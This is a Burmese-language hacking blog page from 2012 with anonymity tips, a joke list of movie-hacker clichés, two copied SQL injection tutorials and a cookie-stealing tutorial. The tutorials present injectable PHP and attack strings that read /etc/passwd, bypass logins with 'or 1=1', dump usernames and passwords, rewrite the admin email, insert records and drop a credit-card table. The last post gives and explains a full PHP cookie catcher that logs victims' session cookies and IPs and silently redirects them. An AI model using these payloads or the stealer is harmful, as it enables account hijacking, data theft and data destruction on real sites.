အျပည့္အစံုကို ဒီမွာဆက္လက္ဖတ္ရႈႏိုင္ပါတယ္....။
https://www.torproject.org/about/overview.html.en

Download Here
Download Here


SSH Tunneling

SSH Tunneling ကိုအသံုးျပဳဖို႕ ေအာက္ပါ ေဆာ့၀ဲေတြ လိုအပ္ပါတယ္.....။

  1. PuTTY
  2. Firefox
Download PuTTY Here




ကဲ ေအာက္ပါအတိုင္းလိုက္ျပီးလုပ္လိုက္ၾကရေအာင္

1.PuTTY ကိုဖြင့္လိုက္ပါ.
2.ျပီးရင္ Text Box မွာ သင့္ IP address ကိုထည့္ရပါမည္...။


3.ျပီးရင္ ဘယ္ဘက္ အျခမ္းက အကြက္ထဲက List ေတြထဲမွာ ေအာက္ဆံုးနာေလာက္မွာ SSH ေဘးက '+'
ေလးကိုကလစ္ျပီးဖြင့္ခ်လိုက္ပါ...။
4. Tunnels ကိုကလစ္လိုက္ပါ...
5. သင္ Port ကိုထည့္ ရမွာျဖစ္ျပီး  Dynamic ကိုကလစ္လိုက္ပါ။
6. ျပီးရင္ ADD နဲ႕ Open ကိုကလစ္လိုက္ပါ...။ connection ရေအာင္ဆက္သြယ္ပါလိမ့္မယ္..
7. ရျပီဆိုရင္သင့္ Browser ထဲကိုသြားျပီး IP ကို 127.0.0.1 လို႕ထည့္ျပီး port ရိုက္သြင္းပါ..။
8. ဒီအဆင့္ေတြျပီးရင္ သင့္ Browser ကိုအသံုး ျပဳႏိုင္ပါျပီ..။

ကၽြန္ေတာ္ကဘာသာျပန္ျပီးေရးတာဆိုေတာ့ အမွားေတြ ပါႏိုင္ပါတယ္ ဒါ့ေၾကာင့္ လက္သယ္ ခ်ည္းပဲ အား ကိုးမေနပါနဲ႕ မႈရင္းဆိုက္မွာလဲ တစ္ခ်က္ေလာက္၀င္ၾကည့္ႏိုင္ပါတယ္...။
 
http://www.hackforums.net/showthread.php?tid=2237268

Ebook For Staying Anonymous

ေနာက္ျပီး Staying Anonymous အတြက္ စာအုပ္ English version တစ္အုပ္ရိွပဲေသးတယ္  တစ္ခါတည္း တြဲတင္ေပးလိုက္တာ ေအာက္ပါေနရာက ေဒါင္းႏိုင္ပါတယ္....


Download
Download

Auto Hide IP

ေနာက္ျပီး Auto Hide IP ဆိုတာေလးပါ တစ္ခါတည္းလင့္ခ်ိတ္ေပးလိုက္တယ္....သံုးလို႕တကယ္ေကာင္း
တယ္.....။

Download

တစ္ခုေျပာခ်င္တာက ဒီေလာက္ပုန္းေနလဲရွာႏိုင္တဲ့ဟာေတြရိွပါေသးတယ္...။ကၽြန္ေတာ္က အစပ်ိဳးေပးလိုက္တာပါ ေနာက္ထပ္ ဆက္လက္ေလ့လာၾကပါလို႕ေျပာခ်င္ပါတယ္...။တကယ္တမ္းကၽြန္
ေတာ္လဲေလ့လာဆဲသူတစ္ေယာက္ပါ ဘာမွကိုမတတ္ေသးပါဘူး ...။အမွာပါရင္ခုထဲက ေတာင္းပန္ရင္ နဲ႕
အဆံုးသတ္ပါရေစဗ်ာ...။

PS: လင့္မ်ားမေကာင္းရင္ Cbox ထဲမွာ ေရးသြားႏိုင္ပါတယ္....

http://shwekoyantaw.blogspot.com
shwekoyantaw










Read More ->>

Monday, June 4, 2012

Hackers from the M0VI3




ကၽြန္ေတာ္သေဘာက်လိုတင္ေပးလိုက္တာပါ...ေတာ္ေတာ္ေလးကိုသေဘာက်တာ ဘာလို႕လဲ သိခ်င္ရင္
ဆက္လက္ဖတ္ၾကည့္ၾကေပါ့ဗ်ာ....
ဘယ္သူ႕ကိုမွတုိက္ခိုက္ခ်င္လို႕ရယ္ေတာ့မဟုတ္ဘူး ဒီတိုင္း အပင္ပန္းေျပ ေပ်ာ္ေစ ျပတ္ေစ ကလက္ေစပဲ :-D ( ေတာ္ၾကာ ကၽြန္ေတာ္တစ္ခုခုေရးတိုင္း သူတို႕ကို $ ေဖာင္းထုပါတယ္ လုပ္တဲ့လူေတြရွိေနလို႕ :-D )
ဟုတ္ပါတယ္ ကၽြန္ေတာ္တုိ႕ ဇာတ္လမ္းေတြထဲမွာ Hacker ေတြျမင္ဖူးၾကမယ္ထင္ပါတယ္ လႊတ္ေကာင္း ကြန္ပ်ဳတာအမ်ားၾကီး ေစာ္အလန္းေလးနဲ႕  :-D အဲ့ဒီ့လို Hacker ေတြအေၾကာင္းေပါ့ဗ်ာ
၁.Monitor မ်ား
ဘယ္ Hacker မဆုိပါ ဇာတ္လမ္းေတြထဲမွာဆို မ်ားလိုက္တဲ့ Monitor ေတြ မ်က္စိေျခာက္လံုးပါေတာင္ မေလာက္ဘူး ၾကည့္ရတာေတာ့ေရလည္မိတယ္ ေမာ္နီတာေတြအမ်ားၾကီးနဲ႕ မင္းသား Hacker က မိန္႕မိန္႕ၾကီး ထိုင္လို႕ လန္ကၽြတ္ေနတာပဲ :-D
၂.Typing Skill
အုိ Command ေပးတာၾကည့္ဦးမလား ျမန္လိုက္တဲ့ျဖစ္ျခင္း ခလုတ္နဲ႕လက္ေတာင္ ထိရဲ႕လားမသိဘူး စႏၵယား တီးသလိုပဲ Lol :-P
၃.Never Use Mouse
ရုပ္ရွင္ေတြထဲက Hacker ေတြဟာ ဘယ္ေတာ့မွာ Mouse မသံုးပါဘူး တစ္ေဖ်ာက္ေဖ်ာက္ Key Board ရိုက္တယ္ ျပီးတာနဲ႕ ျဗဳန္းဆို Enter ၾကီး ေခါက္လုိက္ေရာ ေဟာ ျပီးရင္ ထပ္ရိုက္ျပန္ျပီ ျပီးရင္ ေခါက္ျပန္ျပီ :-D
၄.Watch the Bar
Hack ေနခ်ိန္မွာ Process Bar ေလး တျဖည္းျဖည္းခ်င္းတက္လာပါ ျပီးရင္ Enter ၾကးီး ၀ုန္းခနဲေခါက္ျပီး Hack လို႕ျပီးသြားေလသည္ :-D
၅.Password Guessing
Target ရဲ႕ Password ကို Hack ခ်င္ရင္ ဘာမွမသံုးပါနဲ႕ Guessing တစ္ခုနဲ႕တင္ အဆင္ေျပသြားပါျပီ Guessing ဆိုတာေတာင္ လြယ္လြယ္ကူကူပဲသံုးေခါက္ေလာက္ဆို ၀င္ပါ့ေစ :-D
၆.Hack with HTML
Hack ေနခ်ိန္မွာ HTML Code ေတြ Monitor မွာ တသီၾကီးတက္ေနပါေစ :-D Html နဲ႕ ရုပ္ရွင္ထဲမွာ Hack လို႕ရပါတယ္
Mr.Cracker က ပို႕စ္ကို ကြန္႕ျပီး ေရးတာပါ ေရွ႕က ေျပာသလိုပဲ ေျပာေစ ပ်က္ေစ ကလက္ေစ သက္သက္ပါ ေက်းဇူးတင္ပါတယ္


source from ghostarea.net
Read More ->>

Saturday, May 26, 2012

2 Sql injection tutorials By Ghost Area


This Post is copied from www.ghostarea.net


SQL Injection Ultimate Tutorial

SQL Injection ဆိုတာ MySql DataBase ထဲက User Data ေတြကို Inject လုပ္ႏုိင္တဲ့ Vulnerability တစ္ခုပါ SQL Injection အေၾကာင္းမေျပာခင္ MySQL DataBase ဆိုတာ ဘာ SQL ဆိုတာ ဘာ ဆိုတာအရင္ၾကည့္ရေအာင္
DataBase ဆိုတာကေတာ့ ရွင္းပါတယ္ Data အစုအေ၀းေပါ့
SQL ဆုိတာကေတာ့ Structure Query Language လို႕ေခၚတဲ့ Language တစ္ခုျဖစ္ျပီး Data ေတြကို သိမ္းဆည္ဖို႕ စီစဥ္ဖို႕ အထူးျပဳေရးဆြဲထားေသာ Language တစ္ခုျဖစ္ပါတယ္ ။
MySql ဆုိတာကေတာ့ ခုနက SQL Language ကို အသံုးျပဳျပီး ေရးသားထားေသာ နာမည္ေက်ာ္ DataBase Management System ေတြထဲက နာမည္အၾကီးဆံုး Open Source DataBase Management System တစ္ခုျဖစ္ပါတယ္
MySql မွာ Data ေတြကို Table မ်ားျဖင့္ ထားရွိပါတယ္ Tabel ထဲကမွ Column , Roll ဆိုျပီး ထပ္ခြဲထားပါေသးတယ္ ဥပမာ

No. First Name Second Name
1 Negative Thunder
2 Ghost Area
3 John Smith

ဆိုျပီး ဒီလိုထားပါတယ္ အဲ့ဒီ့ Tabel နာမည္ကို Hacktivism လို႕ထားရေအာင္
Query ဆုိတာကေတာ့ အဲ့ဒီ့ Table ထဲက Data ေတြကို ေတာင္းခံတဲ့ Request ေတြျဖစ္ပါတယ္ Select* ဆုိတာနဲ႕စျပီး Sql Language ရဲ႕ အဓိက Operation တစ္ခုျဖစ္ပါတယ္ ဥပမာ Query တစ္ေၾကာင္းကို ၾကည့္ရေအာင္
SELECT * FROM Hacktivism WHERE Second_Name=’Thunder’;
ဒီလို Query ေရးလိုက္ရင္ Negative Thunder ရဲ႕ Data ေတြ လက္ခံရရွိပါလိမ့္မယ္ ။ ဒါဆိုရင္ေတာ့ SQL နဲ႕ Query ေတြအေၾကာင္း နည္းနည္းသိသြားေလာက္ပါျပီ
ဒါဆို SQL Injection အေၾကာင္း ဆက္ရေအာင္ 
SQL Injection ဆိုတာ User Input ကို ေကာင္းစြာ Filter လုပ္မထားေသာ Developer ရဲ႕ အမွားက တစ္ဆင့္ User Data ေတြကို Inject လုပ္ျခင္းပါ
ပထမဆံုး Vuln ျဖစ္ပံု ေတြနဲ႕ Exploit Code နမူနာနဲ႕ Attacking လုပ္ပံုေတြကို တစ္ခ်က္ၾကည့္ရေအာင္ 
exploit.php ရဲ႕ Code ကေလးတစ္ခ်က္ၾကည့္ရေအာင္
<?php
$id = $_GET['id'];
$result = mysql_query( “SELECT name FROM members WHERE id = ‘$id’”);
?>

ၾကည့္လိုက္ရင္ သိသာပါတယ္ User Input တစ္ခုျဖစ္တဲ့ id ကို Filter လုပ္ထားျခင္းမရွိပါ ဒီေတာ့ 
http://site.com/exploit.php?id=1+union+all+select+1,null,load_file(‘e tc/passwd’),4–
ဆိုျပီး Browser က တစ္ဆင့္ Request ေတာင္းလိုက္ရင္ ect/passwd Directory က passwrd File တက္လာပါ့မယ္ ဒါကို Out File Injection လုိ႕လည္း ေခၚပါေသးတယ္ ( ခုနက Request မွာသံုးသြားတဲ့ union ဆိုတာကေတာ့ select statement တစ္ခုထက္ပိုျပီး သံုးခ်င္တဲ့အခါမွာသံုးပါတယ္ , load_file ဆုိတာကေတာ့ Server ထဲက File ကို Load လုပ္လိုက္တာပါ )
ဒုတိယ တစ္မ်ိဳးၾကည့္ရေအာင္ပါ .

ဒီတစ္ေခါက္ေတာ့ exploit2.php ရဲ႕ Code ေပါ့
$postsender = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postsender’ AND password = ‘$postpass’”)
or die(“<p>” . mysql_error() . “</p>\n”);


သူ႕မွာလည္း Variable ေတြကို ေသခ်ာဂရုမစိုက္ထားျပန္ဘူး ဒီတစ္ခါေတာ့
username:a or 1=1–
password:blank


ဒီလို Inject လုပ္လုိက္တဲ့အခါမွာ သြားတဲ့ Sql Query က ဒီလိုျဖစ္သြားပါလိမ့္မယ္
SELECT USER from database WHERE
username=’a’ or 1=1


ဒီလိုဆို 1=1 က true or true ျဖစ္ျပီး User Access ကိုလက္ခံသြားပါလိမ့္မယ္...


SQLI Part 2 : Attacking Examples

Part 1 : မွာေတာ့ SQL ဆိုတာဘာ MySQL ဆိုတာ ဘာ Query ေတြအေၾကာင္း နဲ႕ Attacking Example ႏွစ္ခုကို ေရးခဲ့ပါတယ္ ဒီေန႕ေတာ့ အျခားေသာ Attacking Example ေတြနဲ႕ Exploit ေတြကို ဆက္ပါ့မယ္ ။
ဒီ Tutorial မွာေတာ့ URL Bar မွာမဟုတ္ပဲ User Input ထည့္ခြင့္ရေသာ ေနရာမွန္သမွ် မွာ Inject လုပ္မယ့္ Attacking Mode ေတြကို Example ေတြနဲ႕ ေျပာျပပါ့မယ္ ။ ဥပမာ Search Box လိုေနရာမ်ိဳး Email Address Input လုပ္ရတဲ့ေနရာလိုမ်ိဳးမွာေပါ့
Shopping Site တစ္ခုရဲ႕ Search Form ဆိုပါစို႕ အဲ့ဒီ့ Search Form ဟာ ေစ်း၀ယ္တဲ့ User ေတြ ၀ယ္လို႕တဲ့ကုန္ပစၥည္းကို ရွာေဖြဖို႕လုပ္ထားတာပါ ဒါေပမယ့္ အဲ့ဒီ့ Search Form ဟာ Filter ခံဖို႕ လြတ္ေနပါတယ္ ဥပမာ ဒီလိုေပါ့
if (txtFilter.Text.Length > 0)(
strSQL += ” WHERE ProductName Like ‘” + txtFilter.Text + ‘”;)

အဲ့ဒါဆိုရင္ Attacker က
milk’ UNION Select 0, username,password 0 from users –

ဒီလို Query ေရးလိုက္ရင္ ( milk ဆိုတာ Example Item ပါ ) User Name Password ေတြ တက္လာပါလိမ့္မယ္ ။


 

အဲ့ဒီလိုပဲအျခားေသာ Attack အေနနဲ႕
4.Updating Table
ဒီတစ္ခါေတာ့ DataBase Table ၾကီးကို Update လုပ္ပစ္ပါ့မယ္ ဥပမာ.
milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒါကေတာ့ Example ပဲျပတာပါ site_email က Website Admin Mail ကို Attacker ေမးလ္ကို ေျပာင္းပစ္တဲ့ Example ပါ
အဲ့ဒီလို Inject လုပ္ရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email = ‘milk’ ; UPDATE site_database SET site_email = ‘admin@site.com’ WHERE email =’attacker@email.com; –
ဒီလို Request ျဖစ္သြားတာေၾကာင့္ Table Update ျဖစ္သြားပါတယ္
5.Adding New Record
ဒီတစ္ခါေတာ့ DataBase မွာ Record အသစ္ထည့္မွာပါ
milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
site_customer ထဲကို Attacker ဟာ သူ႕ရဲ႕ Record ေတြထည့္လုိက္တဲ့ Injecting Code ပါ အဲ့ဒီလို Inject လုပ္လုိက္ရင္ Query မွ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’;INSERT INTO site_customers (‘site-email’,site-password’,'site-login_id’,site-lastname’) VALUES (‘attcker@email.com’,'hello’,'attacker’,'hacking attacker’);–
ျဖစ္ျပီး Record တစ္ခု ထပ္ထည့္ျပီးသားျဖစ္သြားပါလိမ့္မယ္ ။
6.Identifying Table
ဒီတစ္ခါေတာ့ Table တက္လာေအာင္လုပ္ၾကည့္ရေအာင္ ။
milk’ AND 1=(SELECT COUNT(*) FROM mytable); –

ဒီ Code ကိုသာ Inject လုပ္မယ္ဆုိရင္ Query မွာ
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’ AND 1=(SELECT COUNT(*) FROM mytable); –
လို႕ Request လုပ္ျပီး Table ေတြတက္လာပါလိမ့္မယ္
7.Deleting Table
ဒီတစ္ခါေတာ့ Tabel ကို Delete လုပ္မွာပါ
milk’DROP TABLE Creditcard; –

ဒီ Code ကိုသာ Inject လုပ္လုိက္ရင္ SQL Query က
SELECT site_email , site_passwd, site_login_id, site-last_name FROM members WHERE site_email =’milk’DROP TABLE Creditcard; –

လို႕ Request လုပ္သြားျပီး Table ကို Delete လုပ္သြားပါ့မယ္

 

Read More ->>

Saturday, May 12, 2012

About Linux and Ubuntu



Linux အေၾကာင္းနဲ႕ Ubuntu အေၾကာင္းစာေဆာင္အတိုေလးပါ......။ဖတ္ၾကည့္ေတာ့သမိုင္းေၾကာင္းကအစ ျပည့္
ၿပည့္ စံုစံုထည့္သြင္းေရးသာထားပါတယ္.....။ဗဟုသုတရခ်င္သူေတြအတြက္ အသ္ပညာတိုးေစမယ့္ စာအုပ္
ေလးတစ္အုပ္ျဖစ္ပါတယ္.........။

သန္ဒါေရးသားထားတာပါ.....။
MHF မွရရိွပါတယ္.......။

Download Links
http://ghostarea.net/wp-content/uploads/2012/04/ubuntu.pdf
http://www.ziddu.com/download/19376217/ubuntu.rar.html
Read More ->>

Friday, May 11, 2012

SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ







SQL Iɴᴊᴇᴄᴛɪᴏɴ Eɴᴄʏᴄʟᴏᴘᴇᴅɪᴄ - Hᴏᴡ ᴛᴏ Aᴛᴛᴀᴄᴋ & Dᴇғᴇɴᴅ - Dɪʀᴇᴄᴛ ʟɪɴᴋ
SQL injection အေၾကာင္းအျပည့္စံု ဆံုးစာအုပ္ျဖစ္ပါလိမ့္မယ္..။ကၽြန္ေတာ္ေတာ့ဖတ္ၾကည့္ျပီး အရမ္းေကာင္းတယ္လို႕ထင္ပါတယ္....။ဖတ္ခ်င္တဲ့သူေတြအတြက္
ျပန္လည္ေ၀မွ်ေပးတာပါ....။


Download Link


 
Thank To:Z3RO C00L (HF)
Read More ->>

Friday, May 4, 2012

Cookies Catchers



ဒီေန႕ေတာ့ Cookies Catcher ေတြအေၾကာင္းေျပာရေအာင္.Cookies Catcher ဆိုတာ Cookies ေတြကို Capture လုပ္ဖို႕ လုပ္ထားတဲ့ PHP Script ပါ။ ( Cookies ဆိုတာေတာ့အထူးေျပာဖို႕လိုမယ္မထင္ပါဘူး Browser ေတြမွာ User Login ေတြ Password ေတြကို သိမ္းထားတဲ့ Special Things ေတြေပါ့ ) ကဲ အခု Cookies Catcher တစ္ခုအေၾကာင္းၾကည့္ရေအာင္.
Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?>

တစ္ခုခ်င္းစီကိုၾကည့္ရေအာင္ဗ်ာ။
Code
$cookie = $_GET['cookie'];

ဒါကေတာ့ Get Method နဲ႕ Cookie ကိုယူပါတယ္
Code
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];


REMOTE_ADDR ကေတာ့ Victim ရ႕ဲ IP ပါ
date
ကေတာ့ Cookies ယူတဲ့ ေန႕ပါ
HTTP_REFERER
ကေတာ့ Cookies သိမ္းခံရတဲ့ Address ပါ ( ဥပမာ Mail.google.com ေပါ့ ) XD
Code
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);

ဒီေနရာေလးကေတာ့ နည္းနည္းရႈပ္သြားပါတယ္ ။ ပထမဆံုး cookies.html ဆိုတဲ့ File ကိုဖြင့္ပါတယ္ ျပီးတာနဲ႕ အဲ့ဒီ့ဖုိင္ထဲမွာ Cookies ကိုသြား Write ပါတယ္ ။ ခုန အထက္က ေရးထားတဲ့ IP , Date , Referer ေတြေရာေပါ့ ျပီးတာနဲ႕ cookies.html ကို ပိတ္လုိက္ပါတယ္
Code
header (\"javascript:history.back()\");
ေနာက္ဆံုးအေၾကာင္းအေနနဲ႕ေတာ့ User ကို Cookies Catcher ထဲကိုေရာက္ျပီး Catcher က Cookies ေတြသိမ္းအျပီး ဘယ္ကို ျပန္ပို႕မယ္ဆုိတာပါ အခုေတာ့ ၀င္ခဲ့တဲ့ေနာက္တစ္ေနရာကိုျပန္ပို႕ထားပါတယ္ (ဥပမာ User က www.site.com/index.php?=shop.phpက လာတယ္ အဲ့မွာ Cookies Catcher ကို၀င္မိသြားတယ္ www.target.com/cookiescatcher.phpေပါ့ Cookies Catcher ကလည္း cookies.html မွာ Cookies ေတြသိမ္းတယ္ ေရာက္သြားတာနဲ႕ Cookies သိမ္းသြားတာကို User မသိလိုက္ပါ ျပီးမွ သိမ္းျပီးမွ User ကိုတစ္ေနရာရာျပန္ပို႕လုိက္ပါတယ္ ဥပမာ index.php ကိုပဲေပါ့ ) 
ကဲ ဒီေလာက္ဆုိ အဆင္ေျပမယ္ထင္ပါတယ္ 
ဒီလုိမ်ိဳး တျခားတစ္ေယာက္ေရးထားတာ ဖတ္ဖူးလို႕ သူ႕ဟာကိုရွာမရတာနဲ႕ ကိုယ္တိုင္စမ္းတ၀ါး၀ါးေရးလိုက္ရပါတယ္  :-D 

source from ghostarea.net
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology